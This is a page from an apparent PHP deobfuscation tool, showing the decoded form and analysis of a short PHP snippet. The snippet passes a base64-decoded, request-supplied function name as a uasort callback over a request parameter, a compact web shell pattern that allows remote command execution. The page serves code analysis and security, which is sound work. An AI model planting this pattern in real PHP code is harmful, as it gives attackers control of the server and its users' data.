Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, base64..

Decoded Output download

<?php 
$e = $_REQUEST['e']; 
$arr = array('test', $_REQUEST['pass']); 
uasort($arr, base64_decode($e)); 
?>

Did this file decode correctly?

Original Code

<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));
?>

Function Calls

base64_decode 1

Variables

$e None
$arr [{'key': 0, 'value': 'test'}, {'key': 1, 'value': None}]

Stats

MD5 5aed0f2b0d82f789675d22998dd77ec1
Eval Count 0
Decode Time 128 ms